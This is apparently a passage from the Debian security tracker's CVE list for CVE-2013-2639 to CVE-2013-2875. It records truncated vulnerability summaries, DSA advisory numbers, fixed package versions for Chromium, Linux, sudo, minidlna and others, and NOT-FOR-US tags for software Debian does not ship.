CVE-2013-2875 (core/rendering/svg/SVGInlineTextBox.cpp in the SVG implementation in B ...) {DSA-2724-1} - chromium-browser 28.0.1500.71-1 [squeeze] - chromium-browser CVE-2013-2874 (Google Chrome before 28.0.1500.71 on Windows, when an Nvidia GPU is us ...) - chromium-browser (Windows-specific) [squeeze] - chromium-browser CVE-2013-2873 (Use-after-free vulnerability in Google Chrome before 28.0.1500.71 allo ...) {DSA-2724-1} - chromium-browser 28.0.1500.71-1 [squeeze] - chromium-browser CVE-2013-2872 (Google Chrome before 28.0.1500.71 on Mac OS X does not ensure a suffic ...) - chromium-browser (MacOS specific) CVE-2013-2871 (Use-after-free vulnerability in Google Chrome before 28.0.1500.71 allo ...) {DSA-2724-1} - chromium-browser 28.0.1500.71-1 [squeeze] - chromium-browser CVE-2013-2870 (Use-after-free vulnerability in Google Chrome before 28.0.1500.71 allo ...) {DSA-2724-1} - chromium-browser 28.0.1500.71-1 [squeeze] - chromium-browser CVE-2013-2869 (Google Chrome before 28.0.1500.71 allows remote attackers to cause a d ...) {DSA-2724-1} - chromium-browser 28.0.1500.71-1 [squeeze] - chromium-browser CVE-2013-2868 (common/extensions/sync_helper.cc in Google Chrome before 28.0.1500.71 ...) {DSA-2724-1} - chromium-browser 28.0.1500.71-1 [squeeze] - chromium-browser CVE-2013-2867 (Google Chrome before 28.0.1500.71 does not properly prevent pop-under ...) {DSA-2724-1} - chromium-browser 28.0.1500.71-1 [squeeze] - chromium-browser CVE-2013-2866 (The Flash plug-in in Google Chrome before 27.0.1453.116, as used on Go ...) - chromium-browser (Flash plugin not included in Chromium) CVE-2013-2865 (Multiple unspecified vulnerabilities in Google Chrome before 27.0.1453 ...) {DSA-2706-1} - chromium-browser 27.0.1453.110-1 [squeeze] - chromium-browser CVE-2013-2864 (The PDF functionality in Google Chrome before 27.0.1453.110 allows rem ...) - chromium-browser (PDF viewer not included in Chromium) CVE-2013-2863 (Google Chrome before 27.0.1453.110 does not properly handle SSL socket ...) {DSA-2706-1} - chromium-browser 27.0.1453.110-1 [squeeze] - chromium-browser CVE-2013-2862 (Skia, as used in Google Chrome before 27.0.1453.110, does not properly ...) {DSA-2706-1} - chromium-browser 27.0.1453.110-1 [squeeze] - chromium-browser CVE-2013-2861 (Use-after-free vulnerability in the SVG implementation in Google Chrom ...) {DSA-2706-1} - chromium-browser 27.0.1453.110-1 [squeeze] - chromium-browser CVE-2013-2860 (Use-after-free vulnerability in Google Chrome before 27.0.1453.110 all ...) {DSA-2706-1} - chromium-browser 27.0.1453.110-1 [squeeze] - chromium-browser CVE-2013-2859 (Google Chrome before 27.0.1453.110 allows remote attackers to bypass t ...) {DSA-2706-1} - chromium-browser 27.0.1453.110-1 [squeeze] - chromium-browser CVE-2013-2858 (Use-after-free vulnerability in the HTML5 Audio implementation in Goog ...) {DSA-2706-1} - chromium-browser 27.0.1453.110-1 [squeeze] - chromium-browser CVE-2013-2857 (Use-after-free vulnerability in Google Chrome before 27.0.1453.110 all ...) {DSA-2706-1} - chromium-browser 27.0.1453.110-1 [squeeze] - chromium-browser CVE-2013-2856 (Use-after-free vulnerability in Google Chrome before 27.0.1453.110 all ...) {DSA-2706-1} - chromium-browser 27.0.1453.110-1 [squeeze] - chromium-browser CVE-2013-2855 (The Developer Tools API in Google Chrome before 27.0.1453.110 allows r ...) {DSA-2706-1} - chromium-browser 27.0.1453.110-1 [squeeze] - chromium-browser CVE-2013-2854 (Google Chrome before 27.0.1453.110 on Windows provides an incorrect ha ...) - chromium-browser (Windows-specific) CVE-2013-2853 (The HTTPS implementation in Google Chrome before 28.0.1500.71 does not ...) {DSA-2724-1} - chromium-browser 28.0.1500.71-1 [squeeze] - chromium-browser CVE-2013-2852 (Format string vulnerability in the b43_request_firmware function in dr ...) {DSA-2766-1 DSA-2745-1} - linux 3.9.8-1 (low) - linux-2.6 (low) CVE-2013-2851 (Format string vulnerability in the register_disk function in block/gen ...) {DSA-2766-1 DSA-2745-1} - linux 3.9.8-1 (low) - linux-2.6 (low) CVE-2013-2850 (Heap-based buffer overflow in the iscsi_add_notunderstood_response fun ...) - linux 3.9.4-1 - linux-2.6 (Introduced in 3.1) [wheezy] - linux 3.2.46-1 CVE-2013-2849 (Multiple cross-site scripting (XSS) vulnerabilities in Google Chrome b ...) {DSA-2695-1} - chromium-browser 27.0.1453.93-1 [squeeze] - chromium-browser CVE-2013-2848 (The XSS Auditor in Google Chrome before 27.0.1453.93 might allow remot ...) {DSA-2695-1} - chromium-browser 27.0.1453.93-1 [squeeze] - chromium-browser CVE-2013-2847 (Race condition in the workers implementation in Google Chrome before 2 ...) {DSA-2695-1} - chromium-browser 27.0.1453.93-1 [squeeze] - chromium-browser CVE-2013-2846 (Use-after-free vulnerability in the media loader in Google Chrome befo ...) {DSA-2695-1} - chromium-browser 27.0.1453.93-1 [squeeze] - chromium-browser CVE-2013-2845 (The Web Audio implementation in Google Chrome before 27.0.1453.93 allo ...) {DSA-2695-1} - chromium-browser 27.0.1453.93-1 [squeeze] - chromium-browser CVE-2013-2844 (Use-after-free vulnerability in the Cascading Style Sheets (CSS) imple ...) {DSA-2695-1} - chromium-browser 27.0.1453.93-1 [squeeze] - chromium-browser CVE-2013-2843 (Use-after-free vulnerability in Google Chrome before 27.0.1453.93 allo ...) {DSA-2695-1} - chromium-browser 27.0.1453.93-1 [squeeze] - chromium-browser CVE-2013-2842 (Use-after-free vulnerability in Google Chrome before 27.0.1453.93 allo ...) {DSA-2695-1} - chromium-browser 27.0.1453.93-1 [squeeze] - chromium-browser CVE-2013-2841 (Use-after-free vulnerability in Google Chrome before 27.0.1453.93 allo ...) {DSA-2695-1} - chromium-browser 27.0.1453.93-1 [squeeze] - chromium-browser CVE-2013-2840 (Use-after-free vulnerability in the media loader in Google Chrome befo ...) {DSA-2695-1} - chromium-browser 27.0.1453.93-1 [squeeze] - chromium-browser CVE-2013-2839 (Google Chrome before 27.0.1453.93 does not properly perform a cast of ...) {DSA-2695-1} - chromium-browser 27.0.1453.93-1 [squeeze] - chromium-browser CVE-2013-2838 (Google V8, as used in Google Chrome before 27.0.1453.93, allows remote ...) {DSA-2695-1} - chromium-browser 27.0.1453.93-1 [squeeze] - chromium-browser - libv8 [wheezy] - libv8 (Minor issue, Chromium in Wheezy uses its own fixed copy) [squeeze] - libv8 (Unsupported in squeeze-lts) - libv8-3.14 (unimportant; bug #773671) NOTE: libv8 not covered by security support CVE-2013-2837 (Use-after-free vulnerability in the SVG implementation in Google Chrom ...) {DSA-2695-1} - chromium-browser 27.0.1453.93-1 [squeeze] - chromium-browser CVE-2013-2836 (Multiple unspecified vulnerabilities in Google Chrome before 27.0.1453 ...) - chromium-browser 27.0.1453.93-1 [squeeze] - chromium-browser CVE-2013-2835 (Google Chrome OS before 26.0.1410.57 does not properly enforce origin ...) NOT-FOR-US: Google Chrome OS CVE-2013-2834 (Google Chrome OS before 26.0.1410.57 does not properly enforce origin ...) NOT-FOR-US: Google Chrome OS CVE-2013-2833 (Use-after-free vulnerability in the O3D plug-in in Google Chrome OS be ...) NOT-FOR-US: Google Chrome OS CVE-2013-2832 (The Buffer::Set function in core/cross/buffer.cc in the O3D plug-in in ...) NOT-FOR-US: Google Chrome OS CVE-2013-2831 RESERVED CVE-2013-2830 (Use-after-free vulnerability in SumatraPDF Reader 2.x before 2.2.1 all ...) NOT-FOR-US: SumatraPDF Reader CVE-2013-2829 (MatrikonOPC SCADA DNP3 OPC Server 1.2.2.0 and earlier allows remote at ...) NOT-FOR-US: MatrikonOPC SCADA DNP3 OPC Server CVE-2013-2828 (The DNP Master Driver in the OSIsoft PI Interface before 3.1.2.54 for ...) NOT-FOR-US: OSIsoft PI Interface CVE-2013-2827 (An unspecified ActiveX control in WellinTech KingSCADA before 3.1.2, K ...) NOT-FOR-US: WellinTech KingSCADA CVE-2013-2826 (WellinTech KingSCADA before 3.1.2, KingAlarm&Event before 3.1, and ...) NOT-FOR-US: WellinTech KingSCADA CVE-2013-2825 (The DNP3 service in the Outstation component on Elecsys Director Gatew ...) NOT-FOR-US: Elecsys Director Gateway CVE-2013-2824 (Schneider Electric StruxureWare SCADA Expert Vijeo Citect 7.40, Vijeo ...) NOT-FOR-US: Schneider Electric StruxureWare SCADA Expert Vijeo Citect CVE-2013-2823 (The (1) Catapult DNP3 I/O driver before 7.2.0.60 and the (2) GE Intell ...) NOT-FOR-US: Catapult DNP3 I/O driver CVE-2013-2822 (NovaTech Orion Substation Automation Platform OrionLX DNP Master 1.27. ...) NOT-FOR-US: NovaTech CVE-2013-2821 (NovaTech Orion Substation Automation Platform OrionLX DNP Master 1.27. ...) NOT-FOR-US: NovaTech CVE-2013-2820 (The Sierra Wireless AirLink Raven X EV-DO gateway 4221_4.0.11.003 and ...) NOT-FOR-US: Sierra Wireless AirLink Raven X EV-DO gateways CVE-2013-2819 (The Sierra Wireless AirLink Raven X EV-DO gateway 4221_4.0.11.003 and ...) NOT-FOR-US: Sierra Wireless AirLink Raven X EV-DO gateways CVE-2013-2818 (The DNP Master Driver in Alstom e-terracontrol 3.5, 3.6, and 3.7 allow ...) NOT-FOR-US: e-terracontrol CVE-2013-2817 (An ActiveX control in IcoLaunch.dll in Mitsubishi Electric Automation ...) NOT-FOR-US: Mitsubishi Electric Automation MC-WorX Suite CVE-2013-2816 (The DNP3 component in Cooper Power Systems SMP 4, 4/DP, and 16 gateway ...) NOT-FOR-US: Cooper Power Systems CVE-2013-2815 REJECTED CVE-2013-2814 (Cooper Power Systems Cybectec DNP3 Master OPC Server allows remote att ...) NOT-FOR-US: Cooper Power Systems CVE-2013-2813 (The DNP3 component in Cooper Power Systems SMP 4, 4/DP, and 16 gateway ...) NOT-FOR-US: Cooper Power Systems CVE-2013-2812 RESERVED CVE-2013-2811 (The (1) Catapult DNP3 I/O driver before 7.2.0.60 and the (2) GE Intell ...) NOT-FOR-US: Catapult DNP3 I/O driver CVE-2013-2810 (Emerson Process Management ROC800 RTU with software 3.50 and earlier, ...) NOT-FOR-US: Emerson CVE-2013-2809 (The DNP Master Driver in the OSIsoft PI Interface before 3.1.2.54 for ...) NOT-FOR-US: OSIsoft PI Interface CVE-2013-2808 (Heap-based buffer overflow in Xper in Philips Xper Information Managem ...) NOT-FOR-US: Xper CVE-2013-2807 (Rockwell Automation RSLinx Enterprise Software (LogReceiver.exe) CPR9, ...) NOT-FOR-US: Rockwell Automation CVE-2013-2806 (Rockwell Automation RSLinx Enterprise Software (LogReceiver.exe) CPR9, ...) NOT-FOR-US: Rockwell Automation CVE-2013-2805 (Rockwell Automation RSLinx Enterprise Software (LogReceiver.exe) CPR9, ...) NOT-FOR-US: Rockwell Automation CVE-2013-2804 (The DNP Master Driver in Software Toolbox TOP Server before 5.12.140.0 ...) NOT-FOR-US: TOP Server OPC Server CVE-2013-2803 (ProSoft RadioLinx ControlScape before 6.00.040 uses a deficient PRNG a ...) NOT-FOR-US: ProSoft RadioLinx ControlScape CVE-2013-2802 (The universal protocol implementation in Sixnet UDR before 2.0 and RTU ...) NOT-FOR-US: Sixnet CVE-2013-2801 (The OSIsoft PI Interface for IEEE C37.118 before 1.0.6.158 allows remo ...) NOT-FOR-US: OSIsoft PI Interface CVE-2013-2800 (The OSIsoft PI Interface for IEEE C37.118 before 1.0.6.158 allows remo ...) NOT-FOR-US: OSIsoft PI Interface CVE-2013-2799 REJECTED CVE-2013-2798 (Schweitzer Engineering Laboratories (SEL) SEL-2241, SEL-3505, and SEL- ...) NOT-FOR-US: Schweitzer Engineering Laboratories CVE-2013-2797 RESERVED CVE-2013-2796 (Schneider Electric Vijeo Citect 7.20 and earlier, CitectSCADA 7.20 and ...) NOT-FOR-US: Schneider Electric Vijeo Citect CVE-2013-2795 REJECTED CVE-2013-2794 (Triangle MicroWorks SCADA Data Gateway 2.50.0309 through 3.00.0616, DN ...) NOT-FOR-US: Triangle MicroWorks SCADA CVE-2013-2793 (Triangle MicroWorks SCADA Data Gateway 2.50.0309 through 3.00.0616, DN ...) NOT-FOR-US: Triangle MicroWorks SCADA CVE-2013-2792 (Schweitzer Engineering Laboratories (SEL) SEL-2241, SEL-3505, and SEL- ...) NOT-FOR-US: Schweitzer Engineering Laboratories CVE-2013-2791 (MatrikonOPC SCADA DNP3 OPC Server 1.2.0 allows remote attackers to cau ...) NOT-FOR-US: MatrikonOPC CVE-2013-2790 (The master-station DNP3 driver before driver19.exe, and Beta2041.exe, ...) NOT-FOR-US: IOServer CVE-2013-2789 (The Kepware DNP Master Driver for the KEPServerEX Communications Platf ...) NOT-FOR-US: Kepware CVE-2013-2788 (The DNP3 Slave service in SUBNET Solutions SubSTATION Server 2.7.0033 ...) NOT-FOR-US: SUBNET Solutions SubSTATION Server CVE-2013-2787 (Alstom e-terracontrol 3.5, 3.6, and 3.7 allows remote attackers to cau ...) NOT-FOR-US: Alstom e-terracontrol CVE-2013-2786 (Alstom Grid MiCOM S1 Agile before 1.0.3 and Alstom Grid MiCOM S1 Studi ...) NOT-FOR-US: Alstom Grid MiCOM S1 CVE-2013-2785 (Multiple buffer overflows in CimWebServer.exe in the WebView component ...) NOT-FOR-US: GE Intelligent Platforms CVE-2013-2784 (Triangle Research International (aka Tri) Nano-10 PLC devices with fir ...) NOT-FOR-US: Triangle Research International CVE-2013-2783 (The DNP3 driver in IOServer drivers 1.0.19.0 allows remote attackers t ...) NOT-FOR-US: IOServer DNP3 drivers CVE-2013-2782 (Schneider Electric Trio J-Series License Free Ethernet Radio with firm ...) NOT-FOR-US: Schneider Electric CVE-2013-2781 (Use-after-free vulnerability in the server application in 3S CODESYS G ...) NOT-FOR-US: 3S CODESYS Gateway CVE-2013-2780 (Siemens SIMATIC S7-1200 PLCs 2.x and 3.x allow remote attackers to cau ...) NOT-FOR-US: Siemens SIMATIC CVE-2013-2779 (Cisco IOS XE 3.4 before 3.4.5S, and 3.5 through 3.7 before 3.7.1S, on ...) NOT-FOR-US: Cisco IOS XE CVE-2013-2778 (Cross-site request forgery (CSRF) vulnerability in addressbook/registe ...) NOT-FOR-US: PHP Address Book CVE-2013-2777 (sudo before 1.7.10p5 and 1.8.x before 1.8.6p6, when the tty_tickets op ...) {DSA-2642-1} - sudo 1.8.5p2-1+nmu1 (bug #701839) CVE-2013-2776 (sudo 1.3.5 through 1.7.10p5 and 1.8.0 through 1.8.6p6, when running on ...) {DSA-2642-1} - sudo 1.8.5p2-1+nmu1 (bug #701839) CVE-2013-2775 RESERVED CVE-2013-2774 RESERVED CVE-2013-2773 (Nitro PDF 8.5.0.26: A specially crafted DLL file can facilitate Arbitr ...) NOT-FOR-US: Nitro PDF CVE-2013-2772 RESERVED CVE-2013-2771 RESERVED CVE-2013-2770 (The installation functionality in the Novell Kanaka component before 2 ...) NOT-FOR-US: Novell Open Enterprise Server (OES) on Mac OS X CVE-2013-2769 RESERVED CVE-2013-2768 RESERVED CVE-2013-2767 (Unspecified vulnerability in Citrix NetScaler Access Gateway Enterpris ...) NOT-FOR-US: Citrix NetScaler Access Gateway CVE-2013-2766 (Cross-site scripting (XSS) vulnerability in Splunk Web in Splunk 4.3.0 ...) NOT-FOR-US: Splunk CVE-2013-2765 (The ModSecurity module before 2.7.4 for the Apache HTTP Server allows ...) - modsecurity-apache 2.6.6-9 (bug #710217) - libapache-mod-security (bug #710217) [wheezy] - modsecurity-apache 2.6.6-6+deb7u1 [squeeze] - libapache-mod-security 2.5.12-1+squeeze2 NOTE: https://raw.github.com/SpiderLabs/ModSecurity/master/CHANGES NOTE: https://github.com/SpiderLabs/ModSecurity/commit/0840b13612a0b7ef1ce7441cf811dcfc6b463fba CVE-2013-2764 (Secure Entry Server before 4.7.0 contains a URI Redirection vulnerabil ...) NOT-FOR-US: Secure Entry Server CVE-2013-2763 (** DISPUTED ** The Schneider Electric M340 PLC modules allow remote at ...) NOT-FOR-US: Schneider Electric M340 modules CVE-2013-2762 (The Schneider Electric Magelis XBT HMI controller has a default passwo ...) NOT-FOR-US: Schneider Electric CVE-2013-2761 (The Schneider Electric M340 BMXNOE01xx and BMXP3420xx PLC modules allo ...) NOT-FOR-US: Schneider Electric CVE-2013-2760 (Buffer overflow in Groovy Media Player 3.2.0 allows remote attackers t ...) NOT-FOR-US: Groovy Media Player CVE-2013-2759 RESERVED CVE-2013-2758 (Apache CloudStack 4.0.0 before 4.0.2 and Citrix CloudPlatform (formerl ...) NOT-FOR-US: CloudStack CVE-2013-2757 (Citrix CloudPlatform (formerly Citrix CloudStack) 3.0.x before 3.0.6 P ...) NOT-FOR-US: Citrix CVE-2013-2756 (Apache CloudStack 4.0.0 before 4.0.2 and Citrix CloudPlatform (formerl ...) NOT-FOR-US: CloudStack CVE-2013-2755 RESERVED CVE-2013-2754 (Cross-site request forgery (CSRF) vulnerability in Umisoft UMI.CMS bef ...) NOT-FOR-US: Umisoft UMI.CMS CVE-2013-2753 RESERVED CVE-2013-2752 (Cross-site request forgery (CSRF) vulnerability in frontview/lib/np_ha ...) NOT-FOR-US: NETGEAR ReadyNAS RAIDiator CVE-2013-2751 (Eval injection vulnerability in frontview/lib/np_handler.pl in the Fro ...) NOT-FOR-US: NETGEAR ReadyNAS RAIDiator CVE-2013-2750 (Cross-site scripting (XSS) vulnerability in e107_plugins/content/handl ...) NOT-FOR-US: e107 CVE-2013-2749 REJECTED CVE-2013-2748 (Belkin Wemo Switch before WeMo_US_2.00.2176.PVT could allow remote att ...) NOT-FOR-US: Belkin CVE-2013-2747 (The password reset feature in Courion Access Risk Management Suite Ver ...) NOT-FOR-US: Courion Access Risk Management Suite CVE-2013-2746 RESERVED CVE-2013-2745 (An SQL Injection vulnerability exists in MiniDLNA prior to 1.1.0 ...) - minidlna 1.1.2+dfsg-1 (low; bug #717131) [wheezy] - minidlna (Minor issue, DLNA only used in a trusted context) NOTE: http://www.securityfocus.com/archive/1/527299/30/0 CVE-2013-2744 (importbuddy.php in the BackupBuddy plugin 2.2.25 for WordPress allows ...) NOT-FOR-US: BackupBuddy plugin for WordPress CVE-2013-2743 (importbuddy.php in the BackupBuddy plugin 1.3.4, 2.1.4, 2.2.25, 2.2.28 ...) NOT-FOR-US: BackupBuddy plugin for WordPress CVE-2013-2742 (importbuddy.php in the BackupBuddy plugin 1.3.4, 2.1.4, 2.2.25, 2.2.28 ...) NOT-FOR-US: BackupBuddy plugin for WordPress CVE-2013-2741 (importbuddy.php in the BackupBuddy plugin 1.3.4, 2.1.4, 2.2.25, 2.2.28 ...) NOT-FOR-US: BackupBuddy plugin for WordPress CVE-2013-2740 RESERVED CVE-2013-2739 (MiniDLNA has heap-based buffer overflow ...) - minidlna 1.1.2+dfsg-1 (low; bug #717131) [wheezy] - minidlna (Minor issue, DLNA only used in a trusted context) NOTE: http://www.securityfocus.com/archive/1/527299/30/0 CVE-2013-2738 (minidlna has SQL Injection that may allow retrieval of arbitrary files ...) - minidlna 1.1.2+dfsg-1 (low; bug #717131) NOTE: http://www.securityfocus.com/archive/1/527299/30/0 [wheezy] - minidlna (Minor issue, DLNA only used in a trusted context) CVE-2013-2737 (A JavaScript API in Adobe Reader and Acrobat 9.x before 9.5.5, 10.x be ...) NOT-FOR-US: Adobe Reader CVE-2013-2736 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11. ...) NOT-FOR-US: Adobe Reader CVE-2013-2735 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11. ...) NOT-FOR-US: Adobe Reader CVE-2013-2734 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11. ...) NOT-FOR-US: Adobe Reader CVE-2013-2733 (Buffer overflow in Adobe Reader and Acrobat 9.x before 9.5.5, 10.x bef ...) NOT-FOR-US: Adobe Reader CVE-2013-2732 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11. ...) NOT-FOR-US: Adobe Reader CVE-2013-2731 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11. ...) NOT-FOR-US: Adobe Reader CVE-2013-2730 (Buffer overflow in Adobe Reader and Acrobat 9.x before 9.5.5, 10.x bef ...) NOT-FOR-US: Adobe Reader CVE-2013-2729 (Integer overflow in Adobe Reader and Acrobat 9.x before 9.5.5, 10.x be ...) NOT-FOR-US: Adobe Reader CVE-2013-2728 (Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on ...) NOT-FOR-US: Adobe Flash Player CVE-2013-2727 (Integer overflow in Adobe Reader and Acrobat 9.x before 9.5.5, 10.x be ...) NOT-FOR-US: Adobe Reader CVE-2013-2726 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11. ...) NOT-FOR-US: Adobe Reader CVE-2013-2725 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11. ...) NOT-FOR-US: Adobe Reader CVE-2013-2724 (Stack-based buffer overflow in Adobe Reader and Acrobat 9.x before 9.5 ...) NOT-FOR-US: Adobe Reader CVE-2013-2723 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11. ...) NOT-FOR-US: Adobe Reader CVE-2013-2722 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11. ...) NOT-FOR-US: Adobe Reader CVE-2013-2721 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11. ...) NOT-FOR-US: Adobe Reader CVE-2013-2720 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11. ...) NOT-FOR-US: Adobe Reader CVE-2013-2719 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11. ...) NOT-FOR-US: Adobe Reader CVE-2013-2718 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11. ...) NOT-FOR-US: Adobe Reader CVE-2013-2717 (Multiple unspecified vulnerabilities in the System Management (aka Sys ...) NOT-FOR-US: EMC CVE-2013-2716 (Puppet Labs Puppet Enterprise before 2.8.0 does not use a "randomized ...) NOT-FOR-US: Puppet Labs Puppet Enterprise CVE-2013-2715 (Cross-site scripting (XSS) vulnerability in the admin view in the Sear ...) NOT-FOR-US: Drupal module search_api CVE-2013-2714 (Cross-site Scripting (XSS) in WordPress podPress Plugin 8.8.10.13 coul ...) NOT-FOR-US: WordPress podPress Plugin CVE-2013-2713 (Cross-site request forgery (CSRF) vulnerability in users_maint.html in ...) NOT-FOR-US: KrisonAV CVE-2013-2712 (Cross-site scripting (XSS) vulnerability in services/get_article.php i ...) NOT-FOR-US: KrisonAV CVE-2013-2711 RESERVED CVE-2013-2710 (Cross-site request forgery (CSRF) vulnerability in the Contextual Rela ...) NOT-FOR-US: WordPress plugin Contextual Related Posts CVE-2013-2709 (Cross-site request forgery (CSRF) vulnerability in the FourSquare Chec ...) NOT-FOR-US: WordPress plugin FourSquare Checkins CVE-2013-2708 (Cross-site request forgery (CSRF) vulnerability in the Content Slide p ...) NOT-FOR-US: WordPress plugin Content Slide CVE-2013-2707 (Cross-site request forgery (CSRF) vulnerability in the Login With Ajax ...) NOT-FOR-US: WordPress plugin CVE-2013-2706 (Cross-site request forgery (CSRF) vulnerability in the Stream Video Pl ...) NOT-FOR-US: WordPress plugin Stream Video Player CVE-2013-2705 (Cross-site request forgery (CSRF) vulnerability in the WordPress Simpl ...) NOT-FOR-US: WordPress plugin Simple Paypal Shopping Cart CVE-2013-2704 (Cross-site request forgery (CSRF) vulnerability in the Dropdown Menu W ...) NOT-FOR-US: WordPress plugin Dropdown Menu Widget CVE-2013-2703 (Cross-site request forgery (CSRF) vulnerability in the Facebook Member ...) NOT-FOR-US: Facebook Members plugin for WordPres CVE-2013-2702 (Cross-site request forgery (CSRF) vulnerability in the Easy AdSense Li ...) NOT-FOR-US: Easy AdSense Lite plugin for WordPress CVE-2013-2701 (Cross-site request forgery (CSRF) vulnerability in the Social Sharing ...) NOT-FOR-US: social sharing toolkit plugin for wp CVE-2013-2700 (Cross-site request forgery (CSRF) vulnerability in the Add/Edit page ( ...) NOT-FOR-US: WordPress plugin WP125 CVE-2013-2699 (Cross-site request forgery (CSRF) vulnerability in the underConstructi ...) NOT-FOR-US: WordPress plugin underConstruction CVE-2013-2698 (Cross-site request forgery (CSRF) vulnerability in the Calendar plugin ...) NOT-FOR-US: WordPress plugin calendar CVE-2013-2697 (Cross-site request forgery (CSRF) vulnerability in the WP-DownloadMana ...) NOT-FOR-US: Wordpress plugin Downloadmanager CVE-2013-2696 (Cross-site request forgery (CSRF) vulnerability in the All in One Webm ...) NOT-FOR-US: WordPress plugin All in One Webmaster CVE-2013-2695 (Cross-site scripting (XSS) vulnerability in invite.php in the WP Sympo ...) NOT-FOR-US: WordPress plugin wp-symposium CVE-2013-2694 (Open redirect vulnerability in invite.php in the WP Symposium plugin 1 ...) NOT-FOR-US: WordPress plugin wp-symposium CVE-2013-2693 (Cross-site request forgery (CSRF) vulnerability in the Options in the ...) NOT-FOR-US: WordPress plugin WP-Print CVE-2013-2692 (Cross-site request forgery (CSRF) vulnerability in the Admin web inter ...) NOT-FOR-US: OpenVPN Access Server CVE-2013-2691 (Stack-based buffer overflow in the JetMPG.ax module in jetAudio 8.0.17 ...) NOT-FOR-US: jetAudio CVE-2013-2690 (SQL injection vulnerability in index.php in Synchroweb Technology SynC ...) NOT-FOR-US: Synchroweb Technology SynConnect 2.0 CVE-2013-2689 RESERVED CVE-2013-2688 (Buffer overflow in phrelay in BlackBerry QNX Neutrino RTOS through 6.5 ...) NOT-FOR-US: QNX Software Development Platform CVE-2013-2687 (Stack-based buffer overflow in the bpe_decompress function in (1) Blac ...) NOT-FOR-US: QNX CVE-2013-2686 (main/http.c in the HTTP server in Asterisk Open Source 1.8.x before 1. ...) - asterisk 1:1.8.13.1~dfsg-2 (bug #704114) [squeeze] - asterisk (httpd code does not read HTTP POST variables) NOTE: https://issues.asterisk.org/jira/browse/ASTERISK-20967 CVE-2013-2685 (Stack-based buffer overflow in res/res_format_attr_h264.c in Asterisk ...) - asterisk (H264 code not yet present) NOTE: https://issues.asterisk.org/jira/browse/ASTERISK-20901 CVE-2013-2684 (Cross-site Scripting (XSS) in Cisco Linksys E4200 1.0.05 Build 7 devic ...) NOT-FOR-US: Cisco CVE-2013-2683 (Cisco Linksys E4200 1.0.05 Build 7 devices contain an Information Disc ...) NOT-FOR-US: Cisco CVE-2013-2682 (Cisco Linksys E4200 1.0.05 Build 7 devices contain a Clickjacking Vuln ...) NOT-FOR-US: Cisco CVE-2013-2681 (Cisco Linksys E4200 1.0.05 Build 7 devices contain a Security Bypass V ...) NOT-FOR-US: Cisco CVE-2013-2680 (Cisco Linksys E4200 1.0.05 Build 7 devices store passwords in cleartex ...) NOT-FOR-US: Cisco CVE-2013-2679 (Multiple cross-site scripting (XSS) vulnerabilities in Cisco Linksys E ...) NOT-FOR-US: Cisco CVE-2013-2678 (Cisco Linksys E4200 1.0.05 Build 7 routers contain a Local File Includ ...) NOT-FOR-US: Cisco CVE-2013-2677 RESERVED CVE-2013-2676 (Brother MFC-9970CDW 1.10 firmware L devices contain an information dis ...) NOT-FOR-US: Brother CVE-2013-2675 (Brother MFC-9970CDW 1.10 devices with Firmware L contain a Frameable r ...) NOT-FOR-US: Brother devices CVE-2013-2674 (Brother MFC-9970CDW 1.10 firmware L devices contain an information dis ...) NOT-FOR-US: Brother MFC-9970CDW 1.10 firmware L devices CVE-2013-2673 (Brother MFC-9970CDW 1.10 firmware L devices contain a security bypass ...) NOT-FOR-US: Brother MFC-9970CDW 1.10 firmware L devices CVE-2013-2672 (Brother MFC-9970CDW devices with firmware 0D allow cleartext submissio ...) NOT-FOR-US: Brother MFC-9970CDW devices CVE-2013-2671 (Multiple cross-site scripting (XSS) vulnerabilities in the Brother MFC ...) NOT-FOR-US: Brother printer CVE-2013-2670 (Cross-site scripting (XSS) vulnerability in the Brother MFC-9970CDW pr ...) NOT-FOR-US: Brother printer CVE-2013-2669 RESERVED CVE-2013-2668 RESERVED CVE-2013-2667 RESERVED CVE-2013-2666 RESERVED CVE-2013-2665 RESERVED CVE-2013-2664 RESERVED CVE-2013-2663 RESERVED CVE-2013-2662 RESERVED CVE-2013-2661 RESERVED CVE-2013-2660 RESERVED CVE-2013-2659 RESERVED CVE-2013-2658 RESERVED CVE-2013-2657 RESERVED CVE-2013-2656 RESERVED CVE-2013-2655 RESERVED CVE-2013-2654 RESERVED CVE-2013-2653 (security/MemberLoginForm.php in SilverStripe 3.0.3 supports login usin ...) - silverstripe (bug #528461) CVE-2013-2652 (CRLF injection vulnerability in help/help_language.php in WebCollab 3. ...) NOT-FOR-US: WebCollab CVE-2013-2651 (Multiple cross-site scripting (XSS) vulnerabilities in BoltWire 3.5 an ...) NOT-FOR-US: Boltwire CVE-2013-2650 RESERVED CVE-2013-2649 RESERVED CVE-2013-2648 RESERVED CVE-2013-2647 RESERVED CVE-2013-2646 (TP-LINK TL-WR1043ND V1_120405 devices contain an unspecified denial of ...) NOT-FOR-US: TP-LINK CVE-2013-2645 (Multiple cross-site request forgery (CSRF) vulnerabilities on the TP-L ...) NOT-FOR-US: TP-LINK Router CVE-2013-2644 REJECTED CVE-2013-2643 (Multiple cross-site scripting (XSS) vulnerabilities in Sophos Web Appl ...) NOT-FOR-US: Sophos Web Appliance CVE-2013-2642 (Sophos Web Appliance before 3.7.8.2 allows (1) remote attackers to exe ...) NOT-FOR-US: Sophos Web Appliance CVE-2013-2641 (Directory traversal vulnerability in patience.cgi in Sophos Web Applia ...) NOT-FOR-US: Sophos Web Appliance CVE-2013-2640 (ajax.functions.php in the MailUp plugin before 1.3.2 for WordPress doe ...) NOT-FOR-US: MailUp plugin for Wordpress CVE-2013-2639 (Cross-site scripting (XSS) 